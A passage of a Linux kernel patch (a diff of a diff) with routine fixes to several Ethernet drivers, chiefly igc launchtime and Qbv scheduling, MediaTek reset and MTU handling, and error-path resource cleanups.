++	if (frame_size > i40e_calculate_vsi_rx_buf_len(vsi)) {
+ 		NL_SET_ERR_MSG_MOD(extack, "MTU too large to enable XDP");
+ 		return -EINVAL;
+ 	}
+diff --git a/drivers/net/ethernet/intel/ice/ice_ptp.c b/drivers/net/ethernet/intel/ice/ice_ptp.c
+index 0f668468d1414..53fec5bbe6e00 100644
+--- a/drivers/net/ethernet/intel/ice/ice_ptp.c
++++ b/drivers/net/ethernet/intel/ice/ice_ptp.c
+@@ -639,7 +639,7 @@ static u64 ice_ptp_extend_40b_ts(struct ice_pf *pf, u64 in_tstamp)
+ static bool ice_ptp_tx_tstamp(struct ice_ptp_tx *tx)
+ {
+ 	struct ice_ptp_port *ptp_port;
+-	bool ts_handled = true;
++	bool more_timestamps;
+ 	struct ice_pf *pf;
+ 	u8 idx;
+ 
+@@ -701,11 +701,10 @@ static bool ice_ptp_tx_tstamp(struct ice_ptp_tx *tx)
+ 	 * poll for remaining timestamps.
+ 	 */
+ 	spin_lock(&tx->lock);
+-	if (!bitmap_empty(tx->in_use, tx->len))
+-		ts_handled = false;
++	more_timestamps = tx->init && !bitmap_empty(tx->in_use, tx->len);
+ 	spin_unlock(&tx->lock);
+ 
+-	return ts_handled;
++	return !more_timestamps;
+ }
+ 
+ /**
+@@ -776,6 +775,9 @@ ice_ptp_release_tx_tracker(struct ice_pf *pf, struct ice_ptp_tx *tx)
+ {
+ 	tx->init = 0;
+ 
++	/* wait for potentially outstanding interrupt to complete */
++	synchronize_irq(pf->msix_entries[pf->oicr_idx].vector);
++
+ 	ice_ptp_flush_tx_tracker(pf, tx);
+ 
+ 	kfree(tx->tstamps);
+diff --git a/drivers/net/ethernet/intel/igb/igb_main.c b/drivers/net/ethernet/intel/igb/igb_main.c
+index 473158c09f1d7..24a6ae19ad8ed 100644
+--- a/drivers/net/ethernet/intel/igb/igb_main.c
++++ b/drivers/net/ethernet/intel/igb/igb_main.c
+@@ -1202,8 +1202,12 @@ static int igb_alloc_q_vector(struct igb_adapter *adapter,
+ 	if (!q_vector) {
+ 		q_vector = kzalloc(size, GFP_KERNEL);
+ 	} else if (size > ksize(q_vector)) {
+-		kfree_rcu(q_vector, rcu);
+-		q_vector = kzalloc(size, GFP_KERNEL);
++		struct igb_q_vector *new_q_vector;
++
++		new_q_vector = kzalloc(size, GFP_KERNEL);
++		if (new_q_vector)
++			kfree_rcu(q_vector, rcu);
++		q_vector = new_q_vector;
+ 	} else {
+ 		memset(q_vector, 0, size);
+ 	}
+diff --git a/drivers/net/ethernet/intel/igc/igc.h b/drivers/net/ethernet/intel/igc/igc.h
+index 1e7e7071f64d2..df3e26c0cf01a 100644
+--- a/drivers/net/ethernet/intel/igc/igc.h
++++ b/drivers/net/ethernet/intel/igc/igc.h
+@@ -94,6 +94,8 @@ struct igc_ring {
+ 	u8 queue_index;                 /* logical index of the ring*/
+ 	u8 reg_idx;                     /* physical index of the ring */
+ 	bool launchtime_enable;         /* true if LaunchTime is enabled */
++	ktime_t last_tx_cycle;          /* end of the cycle with a launchtime transmission */
++	ktime_t last_ff_cycle;          /* Last cycle with an active first flag */
+ 
+ 	u32 start_time;
+ 	u32 end_time;
+@@ -182,6 +184,7 @@ struct igc_adapter {
+ 
+ 	ktime_t base_time;
+ 	ktime_t cycle_time;
++	bool qbv_enable;
+ 
+ 	/* OS defined structs */
+ 	struct pci_dev *pdev;
+diff --git a/drivers/net/ethernet/intel/igc/igc_defines.h b/drivers/net/ethernet/intel/igc/igc_defines.h
+index 4f9d7f013a958..4ad35fbdc02e8 100644
+--- a/drivers/net/ethernet/intel/igc/igc_defines.h
++++ b/drivers/net/ethernet/intel/igc/igc_defines.h
+@@ -321,6 +321,8 @@
+ #define IGC_ADVTXD_L4LEN_SHIFT	8  /* Adv ctxt L4LEN shift */
+ #define IGC_ADVTXD_MSS_SHIFT	16 /* Adv ctxt MSS shift */
+ 
++#define IGC_ADVTXD_TSN_CNTX_FIRST	0x00000080
++
+ /* Transmit Control */
+ #define IGC_TCTL_EN		0x00000002 /* enable Tx */
+ #define IGC_TCTL_PSP		0x00000008 /* pad short packets */
+diff --git a/drivers/net/ethernet/intel/igc/igc_main.c b/drivers/net/ethernet/intel/igc/igc_main.c
+index 34889be63e788..34db1c006b20a 100644
+--- a/drivers/net/ethernet/intel/igc/igc_main.c
++++ b/drivers/net/ethernet/intel/igc/igc_main.c
+@@ -1000,25 +1000,118 @@ static int igc_write_mc_addr_list(struct net_device *netdev)
+ 	return netdev_mc_count(netdev);
+ }
+ 
+-static __le32 igc_tx_launchtime(struct igc_adapter *adapter, ktime_t txtime)
++static __le32 igc_tx_launchtime(struct igc_ring *ring, ktime_t txtime,
++				bool *first_flag, bool *insert_empty)
+ {
++	struct igc_adapter *adapter = netdev_priv(ring->netdev);
+ 	ktime_t cycle_time = adapter->cycle_time;
+ 	ktime_t base_time = adapter->base_time;
++	ktime_t now = ktime_get_clocktai();
++	ktime_t baset_est, end_of_cycle;
+ 	u32 launchtime;
++	s64 n;
+ 
+-	/* FIXME: when using ETF together with taprio, we may have a
+-	 * case where 'delta' is larger than the cycle_time, this may
+-	 * cause problems if we don't read the current value of
+-	 * IGC_BASET, as the value writen into the launchtime
+-	 * descriptor field may be misinterpreted.
++	n = div64_s64(ktime_sub_ns(now, base_time), cycle_time);
++
++	baset_est = ktime_add_ns(base_time, cycle_time * (n));
++	end_of_cycle = ktime_add_ns(baset_est, cycle_time);
++
++	if (ktime_compare(txtime, end_of_cycle) >= 0) {
++		if (baset_est != ring->last_ff_cycle) {
++			*first_flag = true;
++			ring->last_ff_cycle = baset_est;
++
++			if (ktime_compare(txtime, ring->last_tx_cycle) > 0)
++				*insert_empty = true;
++		}
++	}
++
++	/* Introducing a window at end of cycle on which packets
++	 * potentially not honor launchtime. Window of 5us chosen
++	 * considering software update the tail pointer and packets
++	 * are dma'ed to packet buffer.
+ 	 */
+-	div_s64_rem(ktime_sub_ns(txtime, base_time), cycle_time, &launchtime);
++	if ((ktime_sub_ns(end_of_cycle, now) < 5 * NSEC_PER_USEC))
++		netdev_warn(ring->netdev, "Packet with txtime=%llu may not be honoured\n",
++			    txtime);
++
++	ring->last_tx_cycle = end_of_cycle;
++
++	launchtime = ktime_sub_ns(txtime, baset_est);
++	if (launchtime > 0)
++		div_s64_rem(launchtime, cycle_time, &launchtime);
++	else
++		launchtime = 0;
+ 
+ 	return cpu_to_le32(launchtime);
+ }
+ 
++static int igc_init_empty_frame(struct igc_ring *ring,
++				struct igc_tx_buffer *buffer,
++				struct sk_buff *skb)
++{
++	unsigned int size;
++	dma_addr_t dma;
++
++	size = skb_headlen(skb);
++
++	dma = dma_map_single(ring->dev, skb->data, size, DMA_TO_DEVICE);
++	if (dma_mapping_error(ring->dev, dma)) {
++		netdev_err_once(ring->netdev, "Failed to map DMA for TX\n");
++		return -ENOMEM;
++	}
++
++	buffer->skb = skb;
++	buffer->protocol = 0;
++	buffer->bytecount = skb->len;
++	buffer->gso_segs = 1;
++	buffer->time_stamp = jiffies;
++	dma_unmap_len_set(buffer, len, skb->len);
++	dma_unmap_addr_set(buffer, dma, dma);
++
++	return 0;
++}
++
++static int igc_init_tx_empty_descriptor(struct igc_ring *ring,
++					struct sk_buff *skb,
++					struct igc_tx_buffer *first)
++{
++	union igc_adv_tx_desc *desc;
++	u32 cmd_type, olinfo_status;
++	int err;
++
++	if (!igc_desc_unused(ring))
++		return -EBUSY;
++
++	err = igc_init_empty_frame(ring, first, skb);
++	if (err)
++		return err;
++
++	cmd_type = IGC_ADVTXD_DTYP_DATA | IGC_ADVTXD_DCMD_DEXT |
++		   IGC_ADVTXD_DCMD_IFCS | IGC_TXD_DCMD |
++		   first->bytecount;
++	olinfo_status = first->bytecount << IGC_ADVTXD_PAYLEN_SHIFT;
++
++	desc = IGC_TX_DESC(ring, ring->next_to_use);
++	desc->read.cmd_type_len = cpu_to_le32(cmd_type);
++	desc->read.olinfo_status = cpu_to_le32(olinfo_status);
++	desc->read.buffer_addr = cpu_to_le64(dma_unmap_addr(first, dma));
++
++	netdev_tx_sent_queue(txring_txq(ring), skb->len);
++
++	first->next_to_watch = desc;
++
++	ring->next_to_use++;
++	if (ring->next_to_use == ring->count)
++		ring->next_to_use = 0;
++
++	return 0;
++}
++
++#define IGC_EMPTY_FRAME_SIZE 60
++
+ static void igc_tx_ctxtdesc(struct igc_ring *tx_ring,
+-			    struct igc_tx_buffer *first,
++			    __le32 launch_time, bool first_flag,
+ 			    u32 vlan_macip_lens, u32 type_tucmd,
+ 			    u32 mss_l4len_idx)
+ {
+@@ -1037,26 +1130,17 @@ static void igc_tx_ctxtdesc(struct igc_ring *tx_ring,
+ 	if (test_bit(IGC_RING_FLAG_TX_CTX_IDX, &tx_ring->flags))
+ 		mss_l4len_idx |= tx_ring->reg_idx << 4;
+ 
++	if (first_flag)
++		mss_l4len_idx |= IGC_ADVTXD_TSN_CNTX_FIRST;
++
+ 	context_desc->vlan_macip_lens	= cpu_to_le32(vlan_macip_lens);
+ 	context_desc->type_tucmd_mlhl	= cpu_to_le32(type_tucmd);
+ 	context_desc->mss_l4len_idx	= cpu_to_le32(mss_l4len_idx);
+-
+-	/* We assume there is always a valid Tx time available. Invalid times
+-	 * should have been handled by the upper layers.
+-	 */
+-	if (tx_ring->launchtime_enable) {
+-		struct igc_adapter *adapter = netdev_priv(tx_ring->netdev);
+-		ktime_t txtime = first->skb->tstamp;
+-
+-		skb_txtime_consumed(first->skb);
+-		context_desc->launch_time = igc_tx_launchtime(adapter,
+-							      txtime);
+-	} else {
+-		context_desc->launch_time = 0;
+-	}
++	context_desc->launch_time	= launch_time;
+ }
+ 
+-static void igc_tx_csum(struct igc_ring *tx_ring, struct igc_tx_buffer *first)
++static void igc_tx_csum(struct igc_ring *tx_ring, struct igc_tx_buffer *first,
++			__le32 launch_time, bool first_flag)
+ {
+ 	struct sk_buff *skb = first->skb;
+ 	u32 vlan_macip_lens = 0;
+@@ -1096,7 +1180,8 @@ no_csum:
+ 	vlan_macip_lens |= skb_network_offset(skb) << IGC_ADVTXD_MACLEN_SHIFT;
+ 	vlan_macip_lens |= first->tx_flags & IGC_TX_FLAGS_VLAN_MASK;
+ 
+-	igc_tx_ctxtdesc(tx_ring, first, vlan_macip_lens, type_tucmd, 0);
++	igc_tx_ctxtdesc(tx_ring, launch_time, first_flag,
++			vlan_macip_lens, type_tucmd, 0);
+ }
+ 
+ static int __igc_maybe_stop_tx(struct igc_ring *tx_ring, const u16 size)
+@@ -1320,6 +1405,7 @@ dma_error:
+ 
+ static int igc_tso(struct igc_ring *tx_ring,
+ 		   struct igc_tx_buffer *first,
++		   __le32 launch_time, bool first_flag,
+ 		   u8 *hdr_len)
+ {
+ 	u32 vlan_macip_lens, type_tucmd, mss_l4len_idx;
+@@ -1406,8 +1492,8 @@ static int igc_tso(struct igc_ring *tx_ring,
+ 	vlan_macip_lens |= (ip.hdr - skb->data) << IGC_ADVTXD_MACLEN_SHIFT;
+ 	vlan_macip_lens |= first->tx_flags & IGC_TX_FLAGS_VLAN_MASK;
+ 
+-	igc_tx_ctxtdesc(tx_ring, first, vlan_macip_lens,
+-			type_tucmd, mss_l4len_idx);
++	igc_tx_ctxtdesc(tx_ring, launch_time, first_flag,
++			vlan_macip_lens, type_tucmd, mss_l4len_idx);
+ 
+ 	return 1;
+ }
+@@ -1415,11 +1501,14 @@ static int igc_tso(struct igc_ring *tx_ring,
+ static netdev_tx_t igc_xmit_frame_ring(struct sk_buff *skb,
+ 				       struct igc_ring *tx_ring)
+ {
++	bool first_flag = false, insert_empty = false;
+ 	u16 count = TXD_USE_COUNT(skb_headlen(skb));
+ 	__be16 protocol = vlan_get_protocol(skb);
+ 	struct igc_tx_buffer *first;
++	__le32 launch_time = 0;
+ 	u32 tx_flags = 0;
+ 	unsigned short f;
++	ktime_t txtime;
+ 	u8 hdr_len = 0;
+ 	int tso = 0;
+ 
+@@ -1433,11 +1522,40 @@ static netdev_tx_t igc_xmit_frame_ring(struct sk_buff *skb,
+ 		count += TXD_USE_COUNT(skb_frag_size(
+ 						&skb_shinfo(skb)->frags[f]));
+ 
+-	if (igc_maybe_stop_tx(tx_ring, count + 3)) {
++	if (igc_maybe_stop_tx(tx_ring, count + 5)) {
+ 		/* this is a hard error */
+ 		return NETDEV_TX_BUSY;
+ 	}
+ 
++	if (!tx_ring->launchtime_enable)
++		goto done;
++
++	txtime = skb->tstamp;
++	skb->tstamp = ktime_set(0, 0);
++	launch_time = igc_tx_launchtime(tx_ring, txtime, &first_flag, &insert_empty);
++
++	if (insert_empty) {
++		struct igc_tx_buffer *empty_info;
++		struct sk_buff *empty;
++		void *data;
++
++		empty_info = &tx_ring->tx_buffer_info[tx_ring->next_to_use];
++		empty = alloc_skb(IGC_EMPTY_FRAME_SIZE, GFP_ATOMIC);
++		if (!empty)
++			goto done;
++
++		data = skb_put(empty, IGC_EMPTY_FRAME_SIZE);
++		memset(data, 0, IGC_EMPTY_FRAME_SIZE);
++
++		igc_tx_ctxtdesc(tx_ring, 0, false, 0, 0, 0);
++
++		if (igc_init_tx_empty_descriptor(tx_ring,
++						 empty,
++						 empty_info) < 0)
++			dev_kfree_skb_any(empty);
++	}
++
++done:
+ 	/* record the location of the first descriptor for this packet */
+ 	first = &tx_ring->tx_buffer_info[tx_ring->next_to_use];
+ 	first->type = IGC_TX_BUFFER_TYPE_SKB;
+@@ -1474,11 +1592,11 @@ static netdev_tx_t igc_xmit_frame_ring(struct sk_buff *skb,
+ 	first->tx_flags = tx_flags;
+ 	first->protocol = protocol;
+ 
+-	tso = igc_tso(tx_ring, first, &hdr_len);
++	tso = igc_tso(tx_ring, first, launch_time, first_flag, &hdr_len);
+ 	if (tso < 0)
+ 		goto out_drop;
+ 	else if (!tso)
+-		igc_tx_csum(tx_ring, first);
++		igc_tx_csum(tx_ring, first, launch_time, first_flag);
+ 
+ 	igc_tx_map(tx_ring, first, hdr_len);
+ 
+@@ -5918,10 +6036,16 @@ static int igc_save_qbv_schedule(struct igc_adapter *adapter,
+ 	bool queue_configured[IGC_MAX_TX_QUEUES] = { };
+ 	u32 start_time = 0, end_time = 0;
+ 	size_t n;
++	int i;
++
++	adapter->qbv_enable = qopt->enable;
+ 
+ 	if (!qopt->enable)
+ 		return igc_tsn_clear_schedule(adapter);
+ 
++	if (qopt->base_time < 0)
++		return -ERANGE;
++
+ 	if (adapter->base_time)
+ 		return -EALREADY;
+ 
+@@ -5933,10 +6057,24 @@ static int igc_save_qbv_schedule(struct igc_adapter *adapter,
+ 
+ 	for (n = 0; n < qopt->num_entries; n++) {
+ 		struct tc_taprio_sched_entry *e = &qopt->entries[n];
+-		int i;
+ 
+ 		end_time += e->interval;
+ 
++		/* If any of the conditions below are true, we need to manually
++		 * control the end time of the cycle.
++		 * 1. Qbv users can specify a cycle time that is not equal
++		 * to the total GCL intervals. Hence, recalculation is
++		 * necessary here to exclude the time interval that
++		 * exceeds the cycle time.
++		 * 2. According to IEEE Std. 802.1Q-2018 section 8.6.9.2,
++		 * once the end of the list is reached, it will switch
++		 * to the END_OF_CYCLE state and leave the gates in the
++		 * same state until the next cycle is started.
++		 */
++		if (end_time > adapter->cycle_time ||
++		    n + 1 == qopt->num_entries)
++			end_time = adapter->cycle_time;
++
+ 		for (i = 0; i < adapter->num_tx_queues; i++) {
+ 			struct igc_ring *ring = adapter->tx_ring[i];
+ 
+@@ -5957,6 +6095,18 @@ static int igc_save_qbv_schedule(struct igc_adapter *adapter,
+ 		start_time += e->interval;
+ 	}
+ 
++	/* Check whether a queue gets configured.
++	 * If not, set the start and end time to be end time.
++	 */
++	for (i = 0; i < adapter->num_tx_queues; i++) {
++		if (!queue_configured[i]) {
++			struct igc_ring *ring = adapter->tx_ring[i];
++
++			ring->start_time = end_time;
++			ring->end_time = end_time;
++		}
++	}
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/ethernet/intel/igc/igc_tsn.c b/drivers/net/ethernet/intel/igc/igc_tsn.c
+index 0fce22de2ab85..356c7455c5cee 100644
+--- a/drivers/net/ethernet/intel/igc/igc_tsn.c
++++ b/drivers/net/ethernet/intel/igc/igc_tsn.c
+@@ -36,7 +36,7 @@ static unsigned int igc_tsn_new_flags(struct igc_adapter *adapter)
+ {
+ 	unsigned int new_flags = adapter->flags & ~IGC_FLAG_TSN_ANY_ENABLED;
+ 
+-	if (adapter->base_time)
++	if (adapter->qbv_enable)
+ 		new_flags |= IGC_FLAG_TSN_QBV_ENABLED;
+ 
+ 	if (is_any_launchtime(adapter))
+@@ -110,15 +110,8 @@ static int igc_tsn_enable_offload(struct igc_adapter *adapter)
+ 		wr32(IGC_STQT(i), ring->start_time);
+ 		wr32(IGC_ENDQT(i), ring->end_time);
+ 
+-		if (adapter->base_time) {
+-			/* If we have a base_time we are in "taprio"
+-			 * mode and we need to be strict about the
+-			 * cycles: only transmit a packet if it can be
+-			 * completed during that cycle.
+-			 */
+-			txqctl |= IGC_TXQCTL_STRICT_CYCLE |
+-				IGC_TXQCTL_STRICT_END;
+-		}
++		txqctl |= IGC_TXQCTL_STRICT_CYCLE |
++			IGC_TXQCTL_STRICT_END;
+ 
+ 		if (ring->launchtime_enable)
+ 			txqctl |= IGC_TXQCTL_QUEUE_MODE_LAUNCHT;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mcs.c b/drivers/net/ethernet/marvell/octeontx2/af/mcs.c
+index c0bedf402da93..f68a6a0e3aa41 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mcs.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mcs.c
+@@ -1184,10 +1184,13 @@ static int mcs_register_interrupts(struct mcs *mcs)
+ 	mcs->tx_sa_active = alloc_mem(mcs, mcs->hw->sc_entries);
+ 	if (!mcs->tx_sa_active) {
+ 		ret = -ENOMEM;
+-		goto exit;
++		goto free_irq;
+ 	}
+ 
+ 	return ret;
++
++free_irq:
++	free_irq(pci_irq_vector(mcs->pdev, MCS_INT_VEC_IP), mcs);
+ exit:
+ 	pci_free_irq_vectors(mcs->pdev);
+ 	mcs->num_vec = 0;
+@@ -1589,6 +1592,7 @@ static void mcs_remove(struct pci_dev *pdev)
+ 
+ 	/* Set MCS to external bypass */
+ 	mcs_set_external_bypass(mcs, true);
++	free_irq(pci_irq_vector(pdev, MCS_INT_VEC_IP), mcs);
+ 	pci_free_irq_vectors(pdev);
+ 	pci_release_regions(pdev);
+ 	pci_disable_device(pdev);
+diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.c b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+index 1d36619c5ec91..9aa1892a609c7 100644
+--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.c
++++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+@@ -3229,6 +3229,30 @@ static void mtk_dim_tx(struct work_struct *work)
+ 	dim->state = DIM_START_MEASURE;
+ }
+ 
++static void mtk_set_mcr_max_rx(struct mtk_mac *mac, u32 val)
++{
++	struct mtk_eth *eth = mac->hw;
++	u32 mcr_cur, mcr_new;
++
++	if (MTK_HAS_CAPS(eth->soc->caps, MTK_SOC_MT7628))
++		return;
++
++	mcr_cur = mtk_r32(mac->hw, MTK_MAC_MCR(mac->id));
++	mcr_new = mcr_cur & ~MAC_MCR_MAX_RX_MASK;
++
++	if (val <= 1518)
++		mcr_new |= MAC_MCR_MAX_RX(MAC_MCR_MAX_RX_1518);
++	else if (val <= 1536)
++		mcr_new |= MAC_MCR_MAX_RX(MAC_MCR_MAX_RX_1536);
++	else if (val <= 1552)
++		mcr_new |= MAC_MCR_MAX_RX(MAC_MCR_MAX_RX_1552);
++	else
++		mcr_new |= MAC_MCR_MAX_RX(MAC_MCR_MAX_RX_2048);
++
++	if (mcr_new != mcr_cur)
++		mtk_w32(mac->hw, mcr_new, MTK_MAC_MCR(mac->id));
++}
++
+ static int mtk_hw_init(struct mtk_eth *eth)
+ {
+ 	u32 dma_mask = ETHSYS_DMA_AG_MAP_PDMA | ETHSYS_DMA_AG_MAP_QDMA |
+@@ -3268,16 +3292,17 @@ static int mtk_hw_init(struct mtk_eth *eth)
+ 		return 0;
+ 	}
+ 
+-	val = RSTCTRL_FE | RSTCTRL_PPE;
+ 	if (MTK_HAS_CAPS(eth->soc->caps, MTK_NETSYS_V2)) {
+ 		regmap_write(eth->ethsys, ETHSYS_FE_RST_CHK_IDLE_EN, 0);
+-
+-		val |= RSTCTRL_ETH;
+-		if (MTK_HAS_CAPS(eth->soc->caps, MTK_RSTCTRL_PPE1))
+-			val |= RSTCTRL_PPE1;
++		val = RSTCTRL_PPE0_V2;
++	} else {
++		val = RSTCTRL_PPE0;
+ 	}
+ 
+-	ethsys_reset(eth, val);
++	if (MTK_HAS_CAPS(eth->soc->caps, MTK_RSTCTRL_PPE1))
++		val |= RSTCTRL_PPE1;
++
++	ethsys_reset(eth, RSTCTRL_ETH | RSTCTRL_FE | val);
+ 
+ 	if (MTK_HAS_CAPS(eth->soc->caps, MTK_NETSYS_V2)) {
+ 		regmap_write(eth->ethsys, ETHSYS_FE_RST_CHK_IDLE_EN,
+@@ -3303,8 +3328,16 @@ static int mtk_hw_init(struct mtk_eth *eth)
+ 	 * up with the more appropriate value when mtk_mac_config call is being
+ 	 * invoked.
+ 	 */
+-	for (i = 0; i < MTK_MAC_COUNT; i++)
++	for (i = 0; i < MTK_MAC_COUNT; i++) {
++		struct net_device *dev = eth->netdev[i];
++
+ 		mtk_w32(eth, MAC_MCR_FORCE_LINK_DOWN, MTK_MAC_MCR(i));
++		if (dev) {
++			struct mtk_mac *mac = netdev_priv(dev);
++
++			mtk_set_mcr_max_rx(mac, dev->mtu + MTK_RX_ETH_HLEN);
++		}
++	}
+ 
+ 	/* Indicates CDM to parse the MTK special tag from CPU
+ 	 * which also is working out for untag packets.
+@@ -3331,9 +3364,12 @@ static int mtk_hw_init(struct mtk_eth *eth)
+ 	mtk_w32(eth, 0x21021000, MTK_FE_INT_GRP);
+ 
+ 	if (MTK_HAS_CAPS(eth->soc->caps, MTK_NETSYS_V2)) {
+-		/* PSE should not drop port8 and port9 packets */
++		/* PSE should not drop port8 and port9 packets from WDMA Tx */
+ 		mtk_w32(eth, 0x00000300, PSE_DROP_CFG);
+ 
++		/* PSE should drop packets to port 8/9 on WDMA Rx ring full */
++		mtk_w32(eth, 0x00000300, PSE_PPE0_DROP);
++
+ 		/* PSE Free Queue Flow Control  */
+ 		mtk_w32(eth, 0x01fa01f4, PSE_FQFC_CFG2);
+ 
+@@ -3420,7 +3456,6 @@ static int mtk_change_mtu(struct net_device *dev, int new_mtu)
+ 	int length = new_mtu + MTK_RX_ETH_HLEN;
+ 	struct mtk_mac *mac = netdev_priv(dev);
+ 	struct mtk_eth *eth = mac->hw;
+-	u32 mcr_cur, mcr_new;
+ 
+ 	if (rcu_access_pointer(eth->prog) &&
+ 	    length > MTK_PP_MAX_BUF_SIZE) {
+@@ -3428,23 +3463,7 @@ static int mtk_change_mtu(struct net_device *dev, int new_mtu)
+ 		return -EINVAL;
+ 	}
+ 
+-	if (!MTK_HAS_CAPS(eth->soc->caps, MTK_SOC_MT7628)) {
+-		mcr_cur = mtk_r32(mac->hw, MTK_MAC_MCR(mac->id));
+-		mcr_new = mcr_cur & ~MAC_MCR_MAX_RX_MASK;
+-
+-		if (length <= 1518)
+-			mcr_new |= MAC_MCR_MAX_RX(MAC_MCR_MAX_RX_1518);
+-		else if (length <= 1536)
+-			mcr_new |= MAC_MCR_MAX_RX(MAC_MCR_MAX_RX_1536);
+-		else if (length <= 1552)
+-			mcr_new |= MAC_MCR_MAX_RX(MAC_MCR_MAX_RX_1552);
+-		else
+-			mcr_new |= MAC_MCR_MAX_RX(MAC_MCR_MAX_RX_2048);
+-
+-		if (mcr_new != mcr_cur)
+-			mtk_w32(mac->hw, mcr_new, MTK_MAC_MCR(mac->id));
+-	}
+-
++	mtk_set_mcr_max_rx(mac, length);
+ 	dev->mtu = new_mtu;
+ 
+ 	return 0;
+diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.h b/drivers/net/ethernet/mediatek/mtk_eth_soc.h
+index b52f3b0177efb..306fdc2c608a4 100644
+--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.h
++++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.h
+@@ -120,6 +120,7 @@
+ #define PSE_FQFC_CFG1		0x100
+ #define PSE_FQFC_CFG2		0x104
+ #define PSE_DROP_CFG		0x108
++#define PSE_PPE0_DROP		0x110
+ 
+ /* PSE Input Queue Reservation Register*/
+ #define PSE_IQ_REV(x)		(0x140 + (((x) - 1) << 2))
+@@ -447,18 +448,14 @@
+ /* ethernet reset control register */
+ #define ETHSYS_RSTCTRL			0x34
+ #define RSTCTRL_FE			BIT(6)
+-#define RSTCTRL_PPE			BIT(31)
+-#define RSTCTRL_PPE1			BIT(30)
++#define RSTCTRL_PPE0			BIT(31)
++#define RSTCTRL_PPE0_V2			BIT(30)
++#define RSTCTRL_PPE1			BIT(31)
+ #define RSTCTRL_ETH			BIT(23)
+ 
+ /* ethernet reset check idle register */
+ #define ETHSYS_FE_RST_CHK_IDLE_EN	0x28
+ 
+-/* ethernet reset control register */
+-#define ETHSYS_RSTCTRL		0x34
+-#define RSTCTRL_FE		BIT(6)
+-#define RSTCTRL_PPE		BIT(31)
+-
+ /* ethernet dma channel agent map */
+ #define ETHSYS_DMA_AG_MAP	0x408
+ #define ETHSYS_DMA_AG_MAP_PDMA	BIT(0)
+diff --git a/drivers/net/ethernet/myricom/myri10ge/myri10ge.c b/drivers/net/ethernet/myricom/myri10ge/myri10ge.c
+index 9063e2e22cd5c..9a9341a348c00 100644
+--- a/drivers/net/ethernet/myricom/myri10ge/myri10ge.c
++++ b/drivers/net/ethernet/myricom/myri10ge/myri10ge.c
+@@ -3913,6 +3913,7 @@ abort_with_slices:
+ 	myri10ge_free_slices(mgp);
+ 
+ abort_with_firmware:
++	kfree(mgp->msix_vectors);
+ 	myri10ge_dummy_rdma(mgp, 0);
+ 
+ abort_with_ioremap:
+diff --git a/drivers/net/ethernet/neterion/s2io.c b/drivers/net/ethernet/neterion/s2io.c
+index 1d3c4474b7cb4..700c05fb05b97 100644
+--- a/drivers/net/ethernet/neterion/s2io.c
++++ b/drivers/net/ethernet/neterion/s2io.c
+@@ -2386,7 +2386,7 @@ static void free_tx_buffers(struct s2io_nic *nic)
+ 			skb = s2io_txdl_getskb(&mac_control->fifos[i], txdp, j);
+ 			if (skb) {
+ 				swstats->mem_freed += skb->truesize;
+-				dev_kfree_skb(skb);
++				dev_kfree_skb_irq(skb);
+ 				cnt++;
+ 			}
+ 		}
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_debug.c b/drivers/net/ethernet/qlogic/qed/qed_debug.c
+index 5250d1d1e49ca..86ecb080b1536 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_debug.c
++++ b/drivers/net/ethernet/qlogic/qed/qed_debug.c
+@@ -1972,9 +1972,10 @@ static u32 qed_grc_dump_addr_range(struct qed_hwfn *p_hwfn,
+ 				   u8 split_id)
+ {
+ 	struct dbg_tools_data *dev_data = &p_hwfn->dbg_info;
+-	u8 port_id = 0, pf_id = 0, vf_id = 0, fid = 0;
++	u8 port_id = 0, pf_id = 0, vf_id = 0;
+ 	bool read_using_dmae = false;
+ 	u32 thresh;
++	u16 fid;
+ 
+ 	if (!dump)
+ 		return len;
+diff --git a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_sriov_common.c b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_sriov_common.c
+index 9282321c2e7fb..f9dd50152b1e3 100644
+--- a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_sriov_common.c
++++ b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_sriov_common.c
+@@ -221,6 +221,8 @@ int qlcnic_sriov_init(struct qlcnic_adapter *adapter, int num_vfs)
+ 	return 0;
+ 
+ qlcnic_destroy_async_wq:
++	while (i--)
++		kfree(sriov->vf_info[i].vp);
+ 	destroy_workqueue(bc->bc_async_wq);
+ 
+ qlcnic_destroy_trans_wq:
+diff --git a/drivers/net/ethernet/rdc/r6040.c b/drivers/net/ethernet/rdc/r6040.c
+index eecd52ed1ed21..f4d434c379e7c 100644
+--- a/drivers/net/ethernet/rdc/r6040.c
++++ b/drivers/net/ethernet/rdc/r6040.c
+@@ -1159,10 +1159,12 @@ static int r6040_init_one(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	err = register_netdev(dev);
+ 	if (err) {
+ 		dev_err(&pdev->dev, "Failed to register net device\n");
+-		goto err_out_mdio_unregister;
++		goto err_out_phy_disconnect;
+ 	}
+ 	return 0;
+ 
++err_out_phy_disconnect:
++	phy_disconnect(dev->phydev);
+ err_out_mdio_unregister:
+ 	mdiobus_unregister(lp->mii_bus);
+ err_out_mdio:
+@@ -1186,6 +1188,7 @@ static void r6040_remove_one(struct pci_dev *pdev)
+ 	struct r6040_private *lp = netdev_priv(dev);
+ 
+ 	unregister_netdev(dev);
++	phy_disconnect(dev->phydev);
+ 	mdiobus_unregister(lp->mii_bus);
+ 	mdiobus_free(lp->mii_bus);
+ 	netif_napi_del(&lp->napi);
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_hwtstamp.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_hwtstamp.c
+index 764832f4dae1a..8b50f03056b7b 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_hwtstamp.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_hwtstamp.c
+@@ -47,7 +47,8 @@ static void config_sub_second_increment(void __iomem *ioaddr,
+ 	if (!(value & PTP_TCR_TSCTRLSSR))
